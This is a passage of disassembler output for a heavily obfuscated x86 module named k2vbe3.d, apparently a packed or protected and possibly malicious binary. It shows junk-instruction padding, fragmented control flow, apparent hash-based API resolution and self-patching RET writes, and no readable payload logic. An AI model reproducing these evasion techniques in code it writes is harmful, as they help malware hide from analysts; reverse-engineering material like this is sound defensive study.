		pop	edi
; START	OF FUNCTION CHUNK FOR sub_445124

loc_450D2E:				; CODE XREF: sub_445124:loc_4493D2j
		push	offset sub_446F26
		jmp	nullsub_358
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4536DC

loc_450D38:				; CODE XREF: sub_4536DC-94A3j
		mov	eax, ecx
		pop	ecx
		push	edi
		push	0ABE1B508h
		pop	edi
		jmp	loc_453257
; END OF FUNCTION CHUNK	FOR sub_4536DC
; ---------------------------------------------------------------------------

loc_450D47:				; CODE XREF: k2vbe3.d:loc_44CA10j
		xor	eax, eax
		mov	al, [ebp-0Bh]
		mov	ecx, 8
		sub	ecx, eax
		xor	eax, eax
		mov	al, [ebp-9]
		push	offset sub_444FFB
		jmp	loc_45B1A2
; ---------------------------------------------------------------------------

locret_450D62:				; CODE XREF: k2vbe3.d:0044B4F7j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_450D63:				; CODE XREF: sub_45762D-15362j
		jmp	nullsub_411
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_450D68:				; CODE XREF: sub_44CA34-2918j
		jo	loc_440953
		mov	ebx, 35EB616Bh
		cdq
		jnp	loc_457421

loc_450D7A:				; CODE XREF: sub_44CA34:loc_45BA3Aj
		mov	eax, 1F56AC7Bh
		call	sub_4553CC
		rol	eax, 5
		jmp	loc_446F3F
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------

loc_450D8C:				; CODE XREF: k2vbe3.d:0043EB89j
		jnz	loc_43D7B9
		jmp	loc_458AC9
; ---------------------------------------------------------------------------

loc_450D97:				; DATA XREF: sub_44EC4A:loc_457431o
		call	sub_443A95
		mov	eax, 8CA83E2Ch
		call	sub_451759
		mov	ds:off_41E03C, eax
		lea	eax, loc_4431E0
		mov	byte ptr [eax],	0C3h
		jmp	loc_43CDD8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC4A

loc_450DBA:				; CODE XREF: sub_44EC4A-BA69j
		mov	eax, [esp+0]
		push	edx
		jmp	loc_455F74
; END OF FUNCTION CHUNK	FOR sub_44EC4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_450DC3:				; CODE XREF: sub_4553CC-C31Fj
					; sub_4553CC:loc_453BDDj
		push	0CE9C8330h
		call	sub_44A0D7

loc_450DCD:				; CODE XREF: sub_45BE5C-CA4Ej
		jmp	loc_44F316
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_450DD2:				; CODE XREF: sub_447664+2A38j
		jmp	loc_4400EE
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0BA

loc_450DD7:				; CODE XREF: sub_43D0BA+15j
		jmp	loc_45B085
; END OF FUNCTION CHUNK	FOR sub_43D0BA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_462. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F1C

loc_450DDD:				; CODE XREF: sub_458F1C-9CA4j
		jmp	loc_44FA9E
; END OF FUNCTION CHUNK	FOR sub_458F1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_450DE2:				; CODE XREF: sub_44D0D5-E54j
		jmp	nullsub_145
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_450DE7:				; CODE XREF: sub_447664-5113j
		jmp	loc_448AB0
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
		not	edi
		jmp	loc_451085
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_450DF3:				; CODE XREF: sub_4467A1:loc_43F022j
		pushf
		push	0B2D8492Ch
		xchg	edi, [esp+4+var_4]
		mov	esi, edi
		pop	edi
		and	esi, 0E45D7D8Fh
		sub	esi, 0C812ED18h
		and	esi, 9E658075h
		jmp	loc_44B506
; END OF FUNCTION CHUNK	FOR sub_4467A1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_176. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_450E17:				; CODE XREF: sub_44660F+11DDAj
		jmp	loc_45AD30
; END OF FUNCTION CHUNK	FOR sub_44660F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FED

loc_450E1C:				; CODE XREF: sub_456FED-E3Dj
		jmp	sub_456FED
; END OF FUNCTION CHUNK	FOR sub_456FED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442D04

loc_450E21:				; CODE XREF: sub_442D04+183B5j
		jz	loc_458341

loc_450E27:				; CODE XREF: k2vbe3.d:0045A578j
		jmp	loc_44A9DC
; END OF FUNCTION CHUNK	FOR sub_442D04
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_450E2C:				; CODE XREF: sub_452719+Bj
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447594

loc_450E31:				; CODE XREF: sub_447594+Bj
		jmp	loc_44A627
; END OF FUNCTION CHUNK	FOR sub_447594
; ---------------------------------------------------------------------------
		sbb	esi, 0FCE23ED3h
		or	edx, 0BC8A120Eh
		test	ecx, edi
		jmp	loc_43D7E1
; ---------------------------------------------------------------------------

loc_450E49:				; DATA XREF: sub_43F26C-1EBCo
		test	eax, eax
		jl	loc_44C17A
		inc	eax
		mov	[ebp-1Ch], eax
		jmp	loc_44C37F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_450E5A:				; CODE XREF: sub_4426DF+2D24j
		call	sub_45234F
		push	ecx
		mov	ecx, edi
		xchg	ecx, [esp+8+var_8]
		push	77A24C46h
		xchg	ebx, [esp+0Ch+var_C]
		jmp	loc_4503EF
; END OF FUNCTION CHUNK	FOR sub_4426DF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_450E73:				; CODE XREF: k2vbe3.d:00450406j
		jmp	loc_43FCC9
; ---------------------------------------------------------------------------

loc_450E78:				; DATA XREF: k2vbe3.d:0045394Fo
		dec	eax
		mov	edx, ds:dword_441774
		mov	[edx], eax
		jmp	sub_4488D6

; =============== S U B	R O U T	I N E =======================================



sub_450E86	proc near		; CODE XREF: sub_44662B+8j

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 004464B1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447F32 SIZE 00000005 BYTES

		add	esp, 0FFFFFFF8h
		jmp	loc_4464B1
sub_450E86	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_450E8E:				; CODE XREF: sub_449372+CD19j
		jge	loc_45A696

loc_450E94:				; CODE XREF: k2vbe3.d:0043C96Aj
		add	eax, 0C3C715C9h
		js	loc_454C1F

loc_450EA0:				; CODE XREF: sub_458D4F-244Aj
		jmp	loc_4466A4
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
		xchg	ebx, [eax]

loc_450EA7:				; CODE XREF: k2vbe3.d:loc_444167j
		jmp	loc_454C16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_450EAC:				; CODE XREF: sub_454E69-B981j
		jz	loc_441B63

loc_450EB2:				; CODE XREF: sub_458279+16j
		jmp	sub_43EEC6
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_450EB7:				; CODE XREF: sub_44B912-1E27j
		jmp	nullsub_448
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		mov	esi, [ebx]
		adc	edi, edx
		jmp	loc_4465CE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_412. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_450EC6:				; CODE XREF: sub_4443DD+5782j
		jmp	loc_450116
; END OF FUNCTION CHUNK	FOR sub_4443DD
; ---------------------------------------------------------------------------

loc_450ECB:				; CODE XREF: k2vbe3.d:loc_442870j
		xchg	esi, [esp]
		mov	edi, ecx
		xchg	edi, [esp]
		push	esi
		push	ebx
		pop	esi
		jmp	loc_442EC6

; =============== S U B	R O U T	I N E =======================================



sub_450EDB	proc near		; CODE XREF: sub_44416D+5C57p
					; sub_440D7B+16D90p
		push	offset sub_45381B
		jmp	nullsub_107
sub_450EDB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_450EE5	proc near		; CODE XREF: sub_4432B0:loc_459BC4j
		retn
sub_450EE5	endp

; ---------------------------------------------------------------------------

loc_450EE6:				; CODE XREF: k2vbe3.d:00454399j
		jmp	nullsub_283
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_373. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44601F

loc_450EEC:				; CODE XREF: sub_45512F:loc_4436FCj
					; sub_44601F+15F41j
		jmp	loc_453C34
; END OF FUNCTION CHUNK	FOR sub_44601F
; ---------------------------------------------------------------------------

loc_450EF1:				; CODE XREF: k2vbe3.d:0045B4D9j
		jmp	sub_448380
; ---------------------------------------------------------------------------
		sbb	ebp, ebx
		jmp	loc_450B7C
; ---------------------------------------------------------------------------
		or	esi, ebx
		jmp	sub_4537C9

; =============== S U B	R O U T	I N E =======================================



sub_450F04	proc near		; CODE XREF: sub_44B912-89Bp
					; sub_44B999+A7B2j

; FUNCTION CHUNK AT 0043E9EF SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004599CF SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	esi
		push	421B301h
		jmp	loc_4599CF
sub_450F04	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_450F14:				; CODE XREF: sub_451EEA+65Dj
		jmp	loc_44F724
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_450F19:				; CODE XREF: sub_45B74D-14C6Dj
		jmp	loc_43C942
; END OF FUNCTION CHUNK	FOR sub_45B74D
; ---------------------------------------------------------------------------

loc_450F1E:				; CODE XREF: k2vbe3.d:004433C8j
		jnz	loc_43D325
		jmp	loc_44DD7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_450F29:				; CODE XREF: sub_44660F:loc_446626j
		jz	loc_441F93
		jmp	loc_4520C8
; END OF FUNCTION CHUNK	FOR sub_44660F
; ---------------------------------------------------------------------------

loc_450F34:				; CODE XREF: k2vbe3.d:loc_4563E9j
		jl	loc_44BDDA
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_450F3A:				; CODE XREF: sub_448B5E+7j
		jmp	loc_43EFAC
; END OF FUNCTION CHUNK	FOR sub_448B5E
; ---------------------------------------------------------------------------
		shl	ebx, 17h
		jmp	loc_44BDD4
; ---------------------------------------------------------------------------

loc_450F47:				; CODE XREF: k2vbe3.d:00458CD9j
		add	esi, 0C08D2A5Dh
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_450F4D:				; CODE XREF: k2vbe3.d:00453F03j
					; sub_43F364:loc_458CC7j
		xor	edx, 0CC2814F2h
		xor	eax, edx
		pop	edx
		mov	edx, [esp-4+arg_0]
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0]
		jmp	loc_44AD01
; END OF FUNCTION CHUNK	FOR sub_43F364
; ---------------------------------------------------------------------------
		jo	loc_44BAEE
		or	edi, esi
		jmp	sub_45BD38

; =============== S U B	R O U T	I N E =======================================



sub_450F71	proc near		; CODE XREF: k2vbe3.d:00451D86j
					; sub_45A9B3:loc_4589B0p

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043C6D7 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043CDFB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043DFD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E73D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043F036 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F49A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F6E3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00440ED2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441782 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441E5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044208E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044246E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004437B0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004438A8 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00443D97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444224 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444504 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004461FD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044666C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00447A93 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004481A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004492C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B0EB SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044BD10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C5A0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044CC08 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CE39 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044CF88 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F5BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450FE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451469 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004532C8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453689 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453D77 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045494C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455D6E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00456EC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004570E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004578B8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045928B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BAD7 SIZE 00000021 BYTES

		xchg	eax, [esp+0]
		pop	eax
		inc	eax
		mov	[ebp-2Ch], eax
		mov	dword ptr [ebp-20h], 0FFFFFFFFh

loc_450F80:				; CODE XREF: sub_44DCF5-3963j
		jnb	loc_44C5A0
		cmp	dword ptr [ebp-20h], 0
		jge	loc_44B0EB
		jmp	loc_44CC08
sub_450F71	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_450F95:				; CODE XREF: sub_44866A:loc_4430D9j
		add	edx, 14h
		mov	ecx, [ebx+edx-8]
		or	ecx, ecx
		jz	loc_445424
		call	sub_441109
		jmp	loc_444884
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------

loc_450FAE:				; CODE XREF: k2vbe3.d:00447CAEj
		pop	ecx
		mov	eax, [esp]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp]
		call	sub_455F6B
		push	11BB5D16h
		jmp	loc_45858A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_450FC7:				; CODE XREF: sub_44D298+38DFj
		jp	loc_448710
		sub	eax, ecx
		jnb	loc_448E7B
		and	esi, eax
		jmp	loc_449C08
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------

loc_450FDC:				; DATA XREF: sub_44803D:loc_44AE67o
		push	edx
		call	sub_45B76B
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_450FE2:				; CODE XREF: sub_450F71:loc_43E73Dj
					; k2vbe3.d:0045AC2Bj
		jmp	loc_44246E
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_450FE7:				; CODE XREF: sub_457D4B-57BAj
		jmp	loc_4582BB
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456767

loc_450FEC:				; CODE XREF: sub_456767-47ADj
		jmp	loc_44F095
; END OF FUNCTION CHUNK	FOR sub_456767
; ---------------------------------------------------------------------------

loc_450FF1:				; CODE XREF: k2vbe3.d:0044EECBj
		mov	ds:dword_41E05C, eax
		lea	eax, nullsub_406
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_406
; ---------------------------------------------------------------------------
		call	nullsub_493
		jmp	ds:dword_41E060
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_493. PRESS KEYPAD	"+" TO EXPAND]
		db 71h,	7Fh, 0FFh
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C579

loc_451015:				; CODE XREF: sub_44C579-5810j
		jmp	sub_44DB26
; END OF FUNCTION CHUNK	FOR sub_44C579

; =============== S U B	R O U T	I N E =======================================



sub_45101A	proc near		; CODE XREF: sub_43E470+5p
					; k2vbe3.d:0044F9BBj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043DD2C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043FDE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442B77 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443A78 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443A83 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00446933 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447235 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447C96 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448292 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449E2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D9F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E937 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451A93 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452210 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045764F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457CB8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458F92 SIZE 00000007 BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_44D9F3
sub_45101A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 5BE2C7B9h
		push	edi
		push	63FFA2Ah
		pop	edi
		sub	edi, ds:4000E8h
		xor	edi, ds:4000F3h
		jmp	loc_45BA30
; ---------------------------------------------------------------------------
		jb	loc_459A68
		jmp	sub_44DCC0
; ---------------------------------------------------------------------------
		mov	eax, 1AABF86Ch
		call	sub_43FFDC
; START	OF FUNCTION CHUNK FOR sub_450983

loc_451059:				; CODE XREF: sub_450983+B87Aj
		jmp	sub_45530F
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_45105E:				; CODE XREF: sub_444EFA+16CE4j
		jmp	loc_44BB68
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_451063:				; CODE XREF: sub_444D7B+2FE0j
		jmp	nullsub_409
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C14C

loc_451068:				; CODE XREF: sub_45C14C+1Bj
		add	eax, 3E1240h
		call	sub_444865
; END OF FUNCTION CHUNK	FOR sub_45C14C
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_451073:				; CODE XREF: sub_44B912+D6CDj
		jmp	loc_44371C
; END OF FUNCTION CHUNK	FOR sub_44B912

; =============== S U B	R O U T	I N E =======================================



sub_451078	proc near		; DATA XREF: sub_45BCF0-F45Bo
		add	eax, eax
		cdq
		call	sub_445F6E
sub_451078	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_451080:				; CODE XREF: sub_4499EC+7j
		jmp	loc_43F5CF
; END OF FUNCTION CHUNK	FOR sub_4499EC
; ---------------------------------------------------------------------------

loc_451085:				; CODE XREF: k2vbe3.d:00450DEEj
		mov	ebx, [esi]

; =============== S U B	R O U T	I N E =======================================



sub_451087	proc near		; CODE XREF: sub_448380+Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00452148 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	ebp
		mov	ebp, ebx

loc_451091:				; CODE XREF: k2vbe3.d:loc_43F778j
		push	offset loc_4492EE
		jmp	loc_452148
sub_451087	endp

; ---------------------------------------------------------------------------

loc_45109B:				; CODE XREF: k2vbe3.d:loc_43EACBj
		pop	ebp
		jmp	sub_44B2D7
; ---------------------------------------------------------------------------
		call	sub_445159
		mov	eax, 320057C2h
		call	sub_451759
		mov	ds:off_41E018, eax
		lea	eax, loc_441B7A
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_4510BC:				; CODE XREF: sub_4580DF:loc_44BD75j
		jmp	loc_43C05F
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_4510C1:				; CODE XREF: sub_43FF59:loc_44678Dj
		test	eax, edi
		jmp	loc_43E175
; END OF FUNCTION CHUNK	FOR sub_43FF59
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_248. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432B0

loc_4510C9:				; CODE XREF: sub_4432B0+F2ECj
					; k2vbe3.d:004525B8j
		add	edx, 68B7D2AFh
		add	eax, edx
		pop	edx
		rol	eax, 0Ah
		sub	eax, 20350441h
		mov	ds:dword_44BDA8, eax
; END OF FUNCTION CHUNK	FOR sub_4432B0
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_4510E1:				; CODE XREF: sub_45512F+Cj
					; k2vbe3.d:00459058j
		sub	eax, 0DFCAFBBFh
		jmp	loc_447308
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------

loc_4510EC:				; CODE XREF: k2vbe3.d:00451D35j
		jnz	loc_442400

loc_4510F2:				; CODE XREF: k2vbe3.d:00451D1Dj
		add	edi, 16CFE5F5h
		call	sub_45429A
; START	OF FUNCTION CHUNK FOR sub_4544C3

loc_4510FD:				; CODE XREF: sub_4544C3:loc_45237Cj
		pop	eax
		xor	eax, 0E184251Eh
		sub	eax, 1B404816h
		add	eax, 9845FBB6h
		mov	eax, [eax]
		jmp	loc_458B32
; END OF FUNCTION CHUNK	FOR sub_4544C3
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E108
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A58

loc_45111D:				; CODE XREF: sub_457A58+1C70j
		jmp	nullsub_324
; END OF FUNCTION CHUNK	FOR sub_457A58
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_283. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jo	loc_44380C
		mov	eax, [esp]
		jmp	loc_455B43
; ---------------------------------------------------------------------------

loc_451131:				; CODE XREF: k2vbe3.d:004434ECj
		jno	loc_44650E
		mov	[esi], edx
		popf

loc_45113A:				; CODE XREF: k2vbe3.d:loc_44B1DDj
		add	esi, 50FC9C3Ah
		xchg	esi, [esp]
		jmp	loc_44ABC7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_451148:				; CODE XREF: sub_44ED3C-FCAAj
					; sub_44ED3C:loc_4582C6j
		call	sub_4436CE
		push	15DC969h
		pop	edx
		sub	edx, 277CFA48h
		cmp	edx, 0C063B7EDh
		jmp	loc_44F4A9
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B495

loc_451164:				; CODE XREF: sub_44B495+D2F9j
		push	offset sub_451F7F
		jmp	loc_4514B2
; END OF FUNCTION CHUNK	FOR sub_44B495
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4568DA

loc_45116E:				; CODE XREF: sub_4568DA-FD30j
		sbb	ebx, esi
		jmp	loc_43CDF3
; END OF FUNCTION CHUNK	FOR sub_4568DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_451175:				; CODE XREF: sub_43F7AC:loc_43DDF6j
		ror	edi, 15h
		xchg	ecx, eax
		mov	edx, [ebp+0]
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; START	OF FUNCTION CHUNK FOR sub_44F1C4

loc_45117D:				; CODE XREF: sub_44F1C4:loc_43DDE5j
		or	eax, 9409CEADh
		xor	eax, 0A1580D48h
		jmp	loc_447405
; END OF FUNCTION CHUNK	FOR sub_44F1C4
; ---------------------------------------------------------------------------

loc_45118E:				; CODE XREF: k2vbe3.d:00442E98j
		push	38893800h
		pop	edi
		or	edi, 4E8A3CB1h
		and	edi, 6B046343h
		add	edi, 9643D911h
		jmp	loc_448199
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_426. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_4511AC:				; CODE XREF: sub_4582DD-ED0j
		jmp	loc_43E1BB
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------

loc_4511B1:				; CODE XREF: k2vbe3.d:0044CD30j
		jmp	loc_453497
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF52

loc_4511B6:				; CODE XREF: sub_43CF52+Aj
		jmp	loc_44B5BA
; END OF FUNCTION CHUNK	FOR sub_43CF52
; ---------------------------------------------------------------------------

locret_4511BB:				; CODE XREF: k2vbe3.d:00450C9Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A60

loc_4511BC:				; CODE XREF: sub_458A60+2713j
		pushf
		or	edx, 69FCE4DCh
		jmp	sub_43FE19
; END OF FUNCTION CHUNK	FOR sub_458A60
; ---------------------------------------------------------------------------

locret_4511C8:				; CODE XREF: k2vbe3.d:00447896j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_4511C9:				; CODE XREF: sub_4479A1+CEEAj
		jmp	loc_44CC20
; END OF FUNCTION CHUNK	FOR sub_4479A1

; =============== S U B	R O U T	I N E =======================================



sub_4511CE	proc near		; DATA XREF: sub_45A502+5o
		call	sub_44E481
		mov	eax, 0B2EE4EE4h
		push	edx
		push	89879C5Fh
		pop	edx
		xor	edx, 1840AAB6h
		sub	edx, ds:4000EEh
		jmp	loc_45A288
sub_4511CE	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4511F1:				; CODE XREF: k2vbe3.d:0043DDBBj
		jb	loc_445048

; =============== S U B	R O U T	I N E =======================================



sub_4511F7	proc near		; CODE XREF: sub_44C90E+433Bp
					; sub_45890F:loc_459B05j

; FUNCTION CHUNK AT 00451734 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451D75 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452F21 SIZE 00000010 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax],	0C3h
		jmp	loc_452F21
sub_4511F7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	eax
		jmp	loc_441537
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_451209:				; CODE XREF: sub_43FECA+B8DEj
					; sub_44FF97:loc_455D34j
		jnz	loc_43F5EE
		jmp	loc_453AF4
; END OF FUNCTION CHUNK	FOR sub_44FF97

; =============== S U B	R O U T	I N E =======================================



sub_451214	proc near		; CODE XREF: sub_45BD87-9829p
					; k2vbe3.d:0045405Cj

; FUNCTION CHUNK AT 0043DE01 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00451648 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xor	eax, ecx
		pop	ecx
		push	ebx
		pushf
		jmp	loc_451648
sub_451214	endp


; =============== S U B	R O U T	I N E =======================================



